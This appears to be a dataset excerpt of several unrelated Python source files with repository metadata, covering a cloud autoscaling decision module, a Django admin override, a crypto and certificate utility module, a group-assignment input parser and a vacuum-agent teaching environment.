self.memory[str(metrics[0])]['arrayMeas'] = np.array([float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])], ndmin=2)
elif self.memory[metrics[0]]['arrayMeas'] is None:
self.memory[metrics[0]]['arrayMeas'] = np.array([float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])], ndmin=2)
else:
self.memory[metrics[0]]['arrayMeas'] = np.append(self.memory[metrics[0]]['arrayMeas'],
[[float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])]], axis=0)
# but add 1 zero measurement for each state for no load cases ??? too many 0s affect centroids?
if write_file:
if write_mem:
used = "Yes"
else:
used = "No"
ms = open(self.measurementsFile, 'a')
# metrics[5] contains the time tick -- when running a simulation, it represents the current minute,
# on actual experiments, it is the current time. Used for debugging and plotting
ms.write(str(metrics[0]) + '\t\t' + str(metrics[1]) + '\t\t' + str(metrics[2]) + '\t\t' +
str(metrics[3]) + '\t\t' + str(metrics[4]) + '\t\t' + str(metrics[5]) + '\t\t'+ used+'\n')
ms.close()
# param state: string Get the average metrics (throughput, latency) for this state.
# return a dictionary with the averages
def get_averages(self, state):
averages = {}
if self.sumMetrics.has_key(state):
averages['throughput'] = float(self.sumMetrics[state]['throughput'] / self.sumMetrics[state]['divide_by'])
averages['latency'] = float(self.sumMetrics[state]['latency'] / self.sumMetrics[state]['divide_by'])
self.log.debug("GETAVERAGES Average metrics for state: " + state + " num of measurements: " + str(
self.sumMetrics[state]['divide_by']) +
" av. throughput: " + str(averages['throughput']) + " av. latency: " +
str(averages['latency']))
return averages
def doKmeans(self, state, from_inlambda, to_inlambda):
# Run kmeans for the measurements of this state and return the centroid point (throughput, latency)
ctd = {}
label = []
centroids = {}
if self.memory[state]['arrayMeas'] != None:
count_state_measurements = len(self.memory[state]['arrayMeas'])
# self.log.debug("DOKMEANS " + str(len(self.memory[state]['arrayMeas'])) +
# " measurements available for state " + state)
sliced_data = None
for j in self.memory[state]['arrayMeas']:
#self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
# If this measurement belongs in the slice we're insterested in
if j[0] >= from_inlambda and j[0] <= to_inlambda:
#self.my_logger.debug("DOKMEANS adding measurement : "+ str(j))
# add it
if sliced_data == None:
sliced_data = np.array(j, ndmin=2)
else:
sliced_data = np.append(sliced_data, [j], axis=0)
k = 1 # number of clusters
# 1. No known lamdba values close to current lambda measurement
if sliced_data == None:
# Check if there are any known values from +-50% inlambda.
# original_inlambda = float(from_inlambda* (10/9))
# from_inlambda = 0.8 * original_inlambda
# to_inlambda = 1.2 * original_inlambda
# self.my_logger.debug("Changed lambda range to +- 20%: "+ str(from_inlambda) + " - "+ str(to_inlambda))
# for j in self.memory[state]['arrayMeas']:
# #self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
# # If this measurement belongs in the slice we're insterested in
# if j[0] >= from_inlambda and j[0] <= to_inlambda:
# # add it
# if sliced_data == None:
# sliced_data = np.array(j, ndmin=2)
# else:
# sliced_data = np.append(sliced_data, [j], axis=0)
# #centroids, label = kmeans2(self.memory[state]['arrayMeas'], k, minit='points') # (obs, k)
# #else:
# if sliced_data == None:
self.log.debug("No known lamdba values close to current lambda measurement. Returning zeros!")
else:
# self.log.debug("DOKMEANS length of sliced_data to be fed to kmeans: " + str(len(sliced_data))
# + " (out of %d total)" % count_state_measurements)
centroids, label = kmeans2(sliced_data, k, minit='points')
pass
# initialize dictionary
num_of_meas = {}
#num_of_meas = {'0': 0, '1': 0, '2': 0, '3': 0, '4': 0}
for j in range(0, k):
num_of_meas[str(j)] = 0
if len(label) > 0:
for i in label:
num_of_meas[str(i)] += 1
max_meas_cluster = max(num_of_meas.iteritems(), key=operator.itemgetter(1))[0]
# self.my_logger.debug("DOKMEANS state: "+ state +" kmeans2 centroids: "+ str(centroids) +" label: "+
# str(num_of_meas) + " cluster with max measurements: "+ str(max_meas_cluster))
ctd['inlambda'] = centroids[int(max_meas_cluster)][0]
ctd['throughput'] = centroids[int(max_meas_cluster)][1]
ctd['latency'] = centroids[int(max_meas_cluster)][2]
ctd['cpu'] = centroids[int(max_meas_cluster)][3]
else:
#self.log.debug("DOKMEANS one of the clusters was empty and so label is None :|. Returning zeros")
ctd['inlambda'] = 0.0
ctd['throughput'] = 0.0
ctd['latency'] = 0.0
ctd['cpu'] = 0.0
#return None
else:
self.log.debug("DOKMEANS self.memory[state]['arrayMeas'] is None :|")
return ctd
def moving_average(self, iterable, n=3):
# moving_average([40, 30, 50, 46, 39, 44]) --> 40.0 42.0 45.0 43.0
# http://en.wikipedia.org/wiki/Moving_average
it = iter(iterable)
d = deque(itertools.islice(it, n - 1))
d.appendleft(0)
s = sum(d)
for elem in it:
s += elem - d.popleft()
d.append(elem)
yield s / float(n)
def predict_load(self):
# Linear Regression gia na doume to slope
stdin, stdout = os.popen2("tail -n 20 " + self.measurementsFile)
stdin.close()
lines = stdout.readlines();
stdout.close()
ten_min_l = [] # store past 10 mins lambda's
ten_min = [] # store past 10 mins ticks
for line in lines:
m = line.split('\t\t') # state, lambda, throughput, latency, cpu, time tick
ten_min_l.append(float(m[1]))
ten_min.append(float(m[5]))
# run running average on the 10 mins lambda measurements
n = 5
run_avg_gen = self.moving_average(ten_min_l, n)
run_avg = []
for r in run_avg_gen:
run_avg.append(float(r))
ten_min_ra = ten_min[2:18] # np.arange(i-8, i-2, 1)
# linear regression on the running average
#(slope, intercept, r_value, p_value, stderr) = linregress(ten_min, ten_min_l)
(slope, intercept, r_value, p_value, stderr) = linregress(ten_min_ra, run_avg)
# fit the running average in a polynomial
coeff = np.polyfit(ten_min, ten_min_l, deg=2)
self.log.debug("Slope (a): " + str(slope) + " Intercept(b): " + str(intercept))
self.log.debug("Polynom coefficients: " + str(coeff))
#self.my_logger.debug("next 10 min prediction "+str(float(slope * (p + 10) + intercept + stderr)))
predicted_l = float(slope * (ten_min[19] + 10) + intercept + stderr) # lambda in 10 mins from now
#predicted_l = np.polyval(coeff, (ten_min[9] + 10)) # lambda in 10 mins from now
if slope > 0:
#if predicted_l > allmetrics['inlambda'] :
dif = 6000 + 10 * int(slope)
#dif = 6000 + 0.2 * int(predicted_l - allmetrics['inlambda'])
self.log.debug("Positive slope: " + str(slope) + " dif: " + str(dif)
+ ", the load is increasing. Moving the lambda slice considered 3K up")
else:
dif = -6000 + 10 * int(slope)
#dif = -6000 + 0.2 * int(predicted_l - allmetrics['inlambda'])
self.log.debug("Negative slope " + str(slope) + " dif: " + str(dif)
+ ", the load is decreasing. Moving the lambda slice considered 3K down")
#dif = ((predicted_l - allmetrics['inlambda'])/ allmetrics['inlambda']) * 0.1 * 6000#* allmetrics['inlambda']
#dif = int((predicted_l / allmetrics['inlambda']) * 6000)
return predicted_l
def publish_to_local_ganglia(self, allmetrics):
"""
Publishes monitoring data to local ganglia agent
:param allmetrics:
:return:
"""
self.log.debug( "TAKEDECISION allmetrics: " + str(allmetrics))
#Publish measurements to ganglia
try:
os.system("gmetric -n ycsb_inlambda -v " + str(
allmetrics['inlambda']) + " -d 15 -t float -u 'reqs/sec' -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
os.system("gmetric -n ycsb_throughput -v " + str(
allmetrics['throughput']) + " -d 15 -t float -u 'reqs/sec' -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
os.system(
"gmetric -n ycsb_latency -v " + str(allmetrics['latency']) + " -d 15 -t float -u ms -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
except:
pass
def handle_metrics(self, client_metrics, server_metrics):
# read metrics
allmetrics = {'inlambda': 0, 'throughput': 0, 'latency': 0, 'cpu': 0}
if not self.debug:
## Aggreggation of YCSB client metrics
clients = 0
servers = 0
# We used to collect server cpu too, do we need it?
#self.log.debug("TAKEDECISION state: %d, pending action: %s. Collecting metrics" % (self.currentState, str(self.pending_action)))
for host in client_metrics.keys():
metric = client_metrics[host]
if isinstance(metric, dict):
for key in metric.keys():
if key.startswith('ycsb_TARGET'):
allmetrics['inlambda'] += float(metric[key])
elif key.startswith('ycsb_THROUGHPUT'):
allmetrics['throughput'] += float(metric[key])
elif key.startswith('ycsb_READ') or key.startswith('ycsb_UPDATE') or key.startswith(
'ycsb_RMW') or key.startswith('ycsb_INSERT'):
allmetrics['latency'] += float(metric[key])
clients += 1
for host in server_metrics.keys():
metric = server_metrics[host]
if isinstance(metric, dict):
#check if host in active cluster hosts
if not host in self.cluster.get_hosts().keys():
continue
servers += 1
for key in metric.keys():
if key.startswith('cpu_idle'):
allmetrics['cpu'] += float(metric[key])
try:
allmetrics['latency'] = allmetrics['latency'] / clients
except:
allmetrics['latency'] = 0
try:
allmetrics['cpu'] = (allmetrics['cpu'] / servers) # average node cpu usage
except:
allmetrics['cpu'] = 0
else:
self.log.info("Running in DEBUG mode, no metrics retrieved!")
return allmetrics
# a log-related variable
pending_action_logged = False
def take_decision(self, client_metrics, server_metrics):
'''
this method reads allmetrics object created by Monitoring.py and decides whether a change
of the number of participating
virtual nodes is due.
'''
# update prediction current minute counter
self.predictor.tick_tock()
if client_metrics is None or server_metrics is None: return
# first parse all metrics
allmetrics = self.handle_metrics(client_metrics, server_metrics)
#self.publish_to_local_ganglia(allmetrics)
pending_action = not (self.pending_action is None) # true if there is no pending action
# 1. Save the current metrics to file and in memory only if there is no pending action.
self.add_measurement([str(self.currentState), allmetrics['inlambda'], allmetrics['throughput'],
allmetrics['latency'], allmetrics['cpu'],
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")],
write_file=True, write_mem=((not pending_action) and bool(env_vars['update_metrics'])))
# if there is a pending action, don't take a decision
if pending_action:
global pending_action_logged
if not pending_action_logged:
self.log.debug("Last action " + self.pending_action + " hasn't finished yet, see you later!")
pending_action_logged = True
if self.debug:
if self.countdown == 0:
self.log.debug("Running a simulation, set state from " + str(self.currentState) + " to " +
str(self.nextState))
self.currentState = self.nextState
self.pending_action = None
else:
self.countdown -= 1
self.log.debug("Reducing countdown to " + str(self.countdown))
# skip decision
self.decision["action"] = "PASS"
self.decision["count"] = 0
return self.decision
pending_action_logged = False
# manage the interval counter (waitForIt)
if self.waitForIt == 0:
self.waitForIt = env_vars['decision_interval'] / env_vars['metric_fetch_interval']
else:
if self.waitForIt == env_vars['decision_interval'] / env_vars['metric_fetch_interval']:
self.log.debug("New decision in " + str(float(self.waitForIt*env_vars['metric_fetch_interval'])/60) +
" mins, see you later!")
self.waitForIt -= 1
self.decision["action"] = "PASS"
self.decision["count"] = 0
return self.decision
# Select values close to the current throughtput, define tha lambda range we're interested in -+ 5%
slice_range=75
from_inlambda = allmetrics['inlambda'] - slice_range
to_inlambda = allmetrics['inlambda'] + slice_range
if self.prediction:
predicted_l = self.predictor.poly_regression()
if predicted_l > 0:
# there are enough data to make a prediction, if not use the actual lambda
self.log.debug(
"Predicted: " + str(predicted_l) + " lambda :" + str(allmetrics['inlambda']))
from_inlambda = predicted_l - slice_range
to_inlambda = predicted_l + slice_range
self.log.debug("TAKEDECISION state %d lambda range: %d - %d" % (self.currentState, from_inlambda, to_inlambda))
# too low to care, the initial num of nodes can answer 1000 req/sec,
# so consider it as 0 1000 * len(cluster.size)!!
if 0.0 < to_inlambda < 1000:
from_inlambda = 0.0
self.log.debug("TAKEDECISION state %d current lambda %d changed lambda range to: %d - %d"
% (self.currentState, allmetrics['inlambda'], from_inlambda, to_inlambda))
# The subgraph we are interested in. It contains only the allowed transitions from the current state.
from_node = max(int(env_vars["min_cluster_size"]), (self.currentState - env_vars["rem_nodes"]))
to_node = min(self.currentState + int(env_vars["add_nodes"]), int(env_vars["max_cluster_size"]))
#self.my_logger.debug("TAKEDECISION creating graph from node: "+ str(from_node) +" to node "+ str(to_node))
#inject the current number of nodes
allmetrics['current_nodes'] = self.currentState
states = fset.FuzzySet()
# Calculate rewards using the values in memory if any, or defaults
for i in range(from_node, to_node + 1):
# se periptwsi pou den exeis 3anadei to state upologizei poso tha ithele na einai to throughput
# allmetrics['max_throughput'] = float(i) * float(self.utils.serv_throughput)
allmetrics['num_nodes'] = i
met = {}
if self.measurementsPolicy.startswith('average'):
met = self.getAverages(str(i))
elif self.measurementsPolicy.startswith('centroid'):
met = self.doKmeans(str(i), from_inlambda, to_inlambda)
#format met output
out_met = {k: int(v) for k,v in met.iteritems()}
self.log.debug("TAKEDECISION state: " + str(i) + " met: " + str(out_met))
if met != None and len(met) > 0:
# Been in this state before, use the measurements
allmetrics['inlambda'] = met['inlambda']
allmetrics['throughput'] = met['throughput']
allmetrics['latency'] = met['latency']
allmetrics['cpu'] = met['cpu']
#self.my_logger.debug("TAKEDECISION adding visited state "+ str(i) +" with gain "+ str(self.memory[str(i)]['r']))
#else:
# No clue for this state use current measurements...
#self.my_logger.debug("TAKEDECISION unknown state "+ str(i) +" with gain "+ str(self.memory[str(i)]['r']))
self.memory[str(i)]['r'] = eval(env_vars["gain"], allmetrics)
# if self.currentState != i:
# self.my_logger.debug(
# "TAKEDECISION adding state " + str(i) + " with gain " + str(self.memory[str(i)]['r']))
states.add(fset.FuzzyElement(str(i), self.memory[str(i)]['r']))
# For the current state, use current measurement
# if self.currentState == i:
# if not self.debug:
# cur_gain = eval(env_vars["gain"], allmetrics)
# # for debugging purposes I compare the current reward with the one computed using the training set
# self.log.debug("TAKEDECISION state %d current reward: %d training set reward: %d"
# % (self.currentState, cur_gain, self.memory[str(i)]['r']))
# self.memory[str(i)]['r'] = cur_gain
# #self.log.debug("TAKEDECISION adding current state " + str(i) + " with gain " + str(cur_gain))
# else:
# cur_gain = (self.memory[str(i)]['r'])
# self.log.debug("TAKEDECISION state %d current state training set reward: %d"
# % (self.currentState, cur_gain))
#
# states.add(fset.FuzzyElement(str(i), cur_gain))
# Create the transition graph
v = []
for i in states.keys():
v.append(i)
v = set(v)
stategraph = fgraph.FuzzyGraph(viter=v, directed=True)
for j in range(from_node, to_node + 1):
if j != self.currentState:
# Connect nodes with allowed transitions from the current node.connect(tail, head, mu) head--mu-->tail
stategraph.connect(str(j), str(self.currentState), eval(env_vars["trans_cost"], allmetrics))
#self.my_logger.debug(
# "TAKEDECISION connecting state " + str(self.currentState) + " with state " + str(j))
# Connect nodes with allowed transitions from node j.
#for k in range(max(int(env_vars["min_cluster_size"]), j - int(env_vars["rem_nodes"])),
# min(j + int(env_vars["add_nodes"]), int(env_vars["max_cluster_size"])+1)):
# if k != j:
# self.my_logger.debug("TAKEDECISION connecting state "+ str(j) +" with state "+ str(k))
# stategraph.connect(str(k), str(j), eval(env_vars["trans_cost"], allmetrics))
#Calculate the V matrix for available transitions
V = {}
for s in range(from_node, to_node + 1):
# Get allowed transitions from this state.
if self.memory[str(s)]['r'] != None:
# For each state s, we need to calculate the transitions allowed.
#allowed_transitions = stategraph.edges(head=str(s))
#Vs = []
# for t in allowed_transitions:
# t[0] is the tail state of the edge (the next state)
# No V from last run
#if self.memory[t[0]]['V'] == None:
# self.memory[t[0]]['V'] = self.memory[t[0]]['r']
# Vs.append(self.memory[t[0]]['r'])
# self.my_logger.debug("TAKEDECISION tail state: "+ t[0] +" head state: "+
# t[1] +" V("+t[0]+") = "+ str(self.memory[t[0]]['V']))
# self.my_logger.debug("TAKEDECISION transition cost from state:"+ str(t[1]) +" to state: "+ str(t[0]) +
# " is "+ str(stategraph.mu(t[1],t[0])))
# The original algo uses previous values of max reward (+ gamma * previous max), we don't
# if len(Vs) > 0:
# V[s] = self.memory[str(s)]['r'] + float(self.utils.gamma) * max(Vs)
# else:
# V[s] = self.memory[str(s)]['r']
V[s] = self.memory[str(s)]['r']
self.log.debug("TAKEDECISION Vs="+str(V))
# Find the max V (the min state with the max value)
max_gain = max(V.values())
max_set = [key for key in V if V[key] == max_gain]
self.log.debug("max set: "+str(max_set))
self.nextState = min(max_set)
self.log.debug("max(V): %d (GAIN=%d)" % (self.nextState, V[self.nextState]))
#self.my_logger.debug("TAKEDECISION next state: "+ str(self.nextState))
# Remember the V values calculated ???
#for i in V.keys():
# self.memory[str(i)]['V'] = V[i]
# self.my_logger.debug("TAKEDECISION V("+ str(i) +") = "+ str(V[i]))
# vis = fuzz.visualization.VisManager.create_backend(stategraph)
# (vis_format, data) = vis.visualize()
#
# with open("%s.%s" % ("states", vis_format), "wb") as fp:
# fp.write(data)
# fp.flush()
# fp.close()
if self.nextState != self.currentState:
self.log.debug("Decided to change state to_next: " + str(self.nextState) + " from_curr: " + str(self.currentState))
# You've chosen to change state, that means that nextState has a greater reward, therefore d is always > 0
current_reward = self.memory[str(self.currentState)]['r']
d = self.memory[str(self.nextState)]['r'] - current_reward
self.log.debug( "Difference is " + str(d) + " abs thres="+str(env_vars['decision_abs_threshold'])+" gte:"+str(float(d) < env_vars['decision_abs_threshold']))
if (current_reward != 0 and (abs(float(d) / current_reward) < env_vars['decision_threshold']))\
or float(d) < env_vars['decision_abs_threshold']:
#false alarm, stay where you are
self.nextState = self.currentState
# skip decision
self.decision["action"] = "PASS"
self.decision["count"] = 0
self.log.debug("ups changed my mind...staying at state: " + str(self.currentState) +
" cause the gain difference is: " + str(abs(d)) +
" which is less than %d%% of the current reward, it's actually %f%%" % (int(100*env_vars['decision_threshold']) ,abs(float(d)*100) / (float(current_reward)+0.001)))
else:
self.log.debug("Difference "+ str(d) + " is greater than threshold ("+str(env_vars['decision_threshold'])+"). Keeping decision")
# If the reward is the same with the state you're in, don't move
# elif (d == 0):
# #false alarm, stay where you are
# self.nextState = self.currentState
# # skip decision
# self.decision["action"] = "PASS"
# self.decision["count"] = 0
# self.log.debug("ups changed my mind...staying at state: " + str(self.currentState) +
# " cause the gain difference is: " + str(abs(d)) +
# " which is less than 10% of the current reward "
# + str(self.memory[str(self.currentState)]['r']))
if self.nextState > self.currentState:
self.decision["action"] = "ADD"
elif self.nextState < self.currentState:
self.decision["action"] = "REMOVE"
self.decision["count"] = abs(int(self.currentState) - int(self.nextState))
#self.log.debug("TAKEDECISION: action " + self.decision["action"] + " " + str(self.decision["count"]) +
# " nodes.")
## Don't perform the action if we're debugging/simulating!!!
if self.debug:
if self.pending_action is None and not self.decision["action"].startswith("PASS"):
self.pending_action = self.decision['action']
self.countdown = 2 * self.decision['count'] * 60 / env_vars['metric_fetch_interval']
#self.currentState = str(self.nextState)
self.log.debug("TAKEDECISION simulation, action will finish in: " + str(self.countdown) + " mins")
else:
self.log.debug("TAKEDECISION Waiting for action to finish: " + str(self.pending_action))
return self.decision
def simulate(self):
self.log.debug("START SIMULATION!!")
## creates a sin load simulated for an hour
# for i in range(0, 3600, 10):
#for i in range(0, 14400, 60): # 4 hours
for i in range(0, 900, 1):
cpu = max(5, 60 * abs(math.sin(0.05 * math.radians(i))) - int(self.currentState))
# lamdba is the query arrival rate, throughput is the processed queries
#l = 60000 + 40000 * math.sin(0.01 * i) + random.uniform(-4000, 4000)
#l = 50000 * math.sin(60 * math.radians(i)/40) + 65000 + random.uniform(-8000, 8000)
#l = 40000 * math.sin(60 * math.radians(i)/50) + 45000 + random.uniform(-4000, 4000)
#l = 30000 * math.sin(0.02 * i) + 55000 + random.uniform(-4000, 4000)
l = 60000 * math.sin(0.04 * i) + 75000 + random.uniform(-6000, 6000)
# first 10 mins
# if i < 1200:
# l = 20000
# elif i < 2400:
# l = 40000
# elif i < 4400:
# l = 60000
# elif i < 6000:
# l = 40000
# elif i < 7200:
# l = 20000
maxThroughput = (float(self.currentState) * float(env_vars["serv_throughput"]))
# latency = 200 # msec
# if (l > maxThroughput):
# latency += (l-maxThroughput)/10 # +100msec for every 1000 reqs queued
#throughput = min(maxThroughput, l)# max throughput for the current cluster
throughput = l #(+/- e ??)
latency = 0.0000004 * l ** 2 + 200 # msec...
if l > maxThroughput:
throughput = maxThroughput - 0.01 * l
latency = 0.00001 * (l - maxThroughput) ** 2 + (0.0000004 * maxThroughput ** 2 + 200) # msec... ?
values = {'latency': latency, 'cpu': cpu, 'inlambda': l, 'throughput': throughput,
'num_nodes': self.currentState}
self.log.debug(
"SIMULATE i: " + str(i) + " state: " + str(self.currentState) + " values:" + str(values)
+ " maxThroughput: " + str(maxThroughput))
#nomizw de xreiazetai giati ginetai kai take_decision kai se debug mode
#self.addMeasurement([self.currentState, str(l), str(throughput), str(latency), str(i)], True)
#if self.pending_action[len(self.pending_action)-1] == "done" :
self.take_decision(values)
time.sleep(1)
return
def simulate_training_set(self):
# run state 12 lambdas
self.log.debug("START SIMULATION!!")
self.debug = True
load = []
for k in range(9, 19):
for j in self.memory[str(k)]['arrayMeas']:
load.append(j[0])
#for i in range(0, 120, 1): # paizei? 1 wra ana miso lepto
for i in range(0, 240*12, 1):
l = load[i]
# throughput = (800 * self.currentState)
# if l < (800 * self.currentState):
# throughput = l
values = {'inlambda': l, 'num_nodes': self.currentState}
self.log.debug(
"SIMULATE i: " + str(i) + " state: " + str(self.currentState) + " values:" + str(values))
self.take_decision(values)
if __name__ == '__main__':
fsm = RLDecisionMaker("localhost")
fsm.simulate_training_set()
|
cmantas/tiramola_v3
|
new_decision_module.py
|
Python
|
apache-2.0
| 36,005
| 0.007055
|
from django.contrib import admin
from django.contrib.flatpages.admin import FlatPageAdmin
from django.contrib.flatpages.models import FlatPage
from django.db import models
from suit_redactor.widgets import RedactorWidget
class FlatPageCustom(FlatPageAdmin):
formfield_overrides = {
models.TextField: {'widget': RedactorWidget(editor_options={'lang': 'en'})}
}
admin.site.unregister(FlatPage)
admin.site.register(FlatPage, FlatPageCustom)
|
moshthepitt/product.co.ke
|
core/admin.py
|
Python
|
mit
| 458
| 0.004367
|
#
# Utility functions
#
import sys
from functools import partial
from uuid import UUID
from hashlib import sha1
from os import path, listdir
from zipfile import ZipFile
from subprocess import Popen, TimeoutExpired
import nacl.utils
import nacl.secret
def isValidUUID(uid):
"""
Validate UUID
@param uid: UUID value to be verfied, can be bytes or str
@return: True if UUID valid, else False
"""
try:
# attempt convertion from bytes to str
uid = uid.decode('ascii')
except AttributeError:
# is already bytes object
pass
except UnicodeDecodeError:
# uid contains non-ascii characters, invalid UUID
return False
try:
out = UUID(uid, version=4)
except ValueError:
return False
# check converted value from UUID equals original value. UUID class is not strict on input
return str(out) == uid
def encrypt(safe, *args):
"""
Encrypt all provided data
@param safe: encryption class
@param args: data to be encrypted
@return: encryption output iterable
"""
return (safe.encrypt(a, nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)) for a in args)
def sha1sum(filePath, blocksize=1024):
"""
Calculate SHA1 hash of file
@param filePath: Path to hashable file
@param blocksize: Amount of bytes to read into memory before hashing
@return: SHA1 hash value (bytes)
"""
with open(filePath, mode='rb') as f:
out = sha1()
for buf in iter(partial(f.read, blocksize), b''):
out.update(buf)
return bytes(out.hexdigest(), encoding='ascii')
def checkCerts():
"""
Checks to see if required TLS certificates exist in Resources directory. Attempts to generate certificates if not found
@returns: Boolean value based on success
"""
resDir = absolutePath('Resources')
command = None
success = False
# check to see if required certificates exist
if not all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
############
# Check OS
############
if sys.platform in ('linux', 'darwin'):
# bash script run
command = 'sh {}'.format('create_certs_linux.sh')
elif sys.platform == 'win32':
hasOpenSSL = False
# check for openssl requirement (downloaded during installer run)
files = sorted((path.isdir(f), f) for f in listdir(resDir) if f.lower().startswith('openssl-'))
# check for expanded directory and executable
for isDir, ofile in files:
if isDir and path.isfile(path.join(resDir, ofile, 'openssl.exe')):
hasOpenSSL = True
newDir = ofile
break
if not hasOpenSSL and files:
# sorted filename to list newest version first)
for ofile in sorted(f for isDir, f in files if not isDir and path.splitext(f)[1] == '.zip'):
# extract archive
with ZipFile(path.join(resDir, ofile), 'r') as ozip:
newDir = path.join(resDir, path.splitext(ofile)[0])
ozip.extractall(path=newDir)
# verify openssl.exe exists in directory
if path.isfile(path.join(newDir, 'openssl.exe')):
hasOpenSSL = True
break
if hasOpenSSL:
# write openssl directory to config file
with open(path.join(resDir, 'openssl.cfg'), 'w') as config:
config.writelines([newDir])
# windows bat command file
command = r'cmd /c {}'.format('create_certs_windows.bat')
if command:
proc = Popen([command], cwd=resDir, shell=True)
try:
proc.wait(180)
except TimeoutExpired:
proc.kill()
# check command has generated correct files
if all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
success = True
else:
success = True
return success
def absolutePath(pathname):
"""
Return the absolute path of the given file or directory
@return: absolute path
"""
if getattr(sys, 'frozen', False):
# Frozen application denotes packaged application, modules are moved into a zip
datadir = path.dirname(sys.executable)
else:
# Source based installation, use parent directory of this module's directory
datadir = path.join(path.dirname(__file__), path.pardir)
return path.abspath(path.join(datadir, pathname))
|
cbrunker/quip
|
lib/Utils.py
|
Python
|
gpl-3.0
| 4,795
| 0.003337
|
# Copyright 2011, Thomas G. Dimiduk
#
# This file is part of GroupEng.
#
# GroupEng is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GroupEng is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with GroupEng. If not, see <http://www.gnu.org/licenses/>.
import re
from .utility import numberize
from .errors import GroupEngFileError
def read_input(infile):
if not hasattr(infile, 'readlines'):
infile = open(infile, 'U')
lines = infile.readlines()
lines = [l.strip() for l in lines if l.strip() != '' and l.strip()[0] != '#']
dek = {}
rules = []
i = 0
while i < len(lines):
line = lines[i]
if re.match('class_?list', line):
dek['classlist'] = split_key(line)[1]
elif re.match('(group_?)?size', line):
dek['group_size'] = split_key(line)[1]
elif re.match('student_identifier', line) or re.match('[Ii][Dd]', line):
dek['student_identifier'] = split_key(line)[1]
elif re.match('number_of_groups', line):
dek['number_of_groups'] = int(split_key(line)[1])
elif re.match('tries', line):
dek['tries'] = int(split_key(line)[1])
elif line[0] == '-':
line = line[1:]
# read a rule
rule = {}
rule['name'] = split_key(line)[0].lower()
rule['attribute'] = split_key(line)[1]
# read extra arguments
while i+1 < len(lines) and lines[i+1][0] != '-':
i += 1
line = lines[i]
key, val = split_key(line)
val = tuple([v.strip() for v in val.split(',')])
vals = []
for v in val:
vals.append(union_group(v))
if len(vals) == 1:
vals = vals[0]
rule[key] = vals
rules.append(rule)
else:
raise GroupEngFileError(line, i+1, infile.name)
i += 1
dek['rules'] = rules
return dek
def split_key(st):
return [s.strip() for s in st.split(':')]
def union_group(item):
items = [i.strip() for i in item.split('=')]
if items[0][0] == '(':
items[0] = items[0][1:]
if items[-1][-1] == ')':
items[-1] = items[-1][:-1]
items = tuple([numberize(i) for i in items])
if len(items) == 1:
items = items[0]
return items
|
tdimiduk/groupeng
|
src/input_parser.py
|
Python
|
agpl-3.0
| 2,845
| 0.002109
|
import agents as ag
import envgui as gui
# change this line ONLY to refer to your project
import submissions.Porter.vacuum2 as v2
# ______________________________________________________________________________
# Vacuum environmenty
class Dirt(ag.Thing):
pass
class VacuumEnvironment(ag.XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=4, height=3):
super(VacuumEnvironment, self).__init__(width, height)
self.add_walls()
def thing_classes(self):
return [ag.Wall, Dirt,
# ReflexVacuumAgent, RandomVacuumAgent,
# TableDrivenVacuumAgent, ModelBasedVacuumAgent
]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
bump = ('Bump' if agent.bump else'None')
return (bump, status)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
dirt = dirt_list[0]
agent.performance += 100
self.delete_thing(dirt)
else:
super(VacuumEnvironment, self).execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
# # Launch a Text-Based Environment
# print('Two Cells, Agent on Left:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Right:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (2, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Top:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
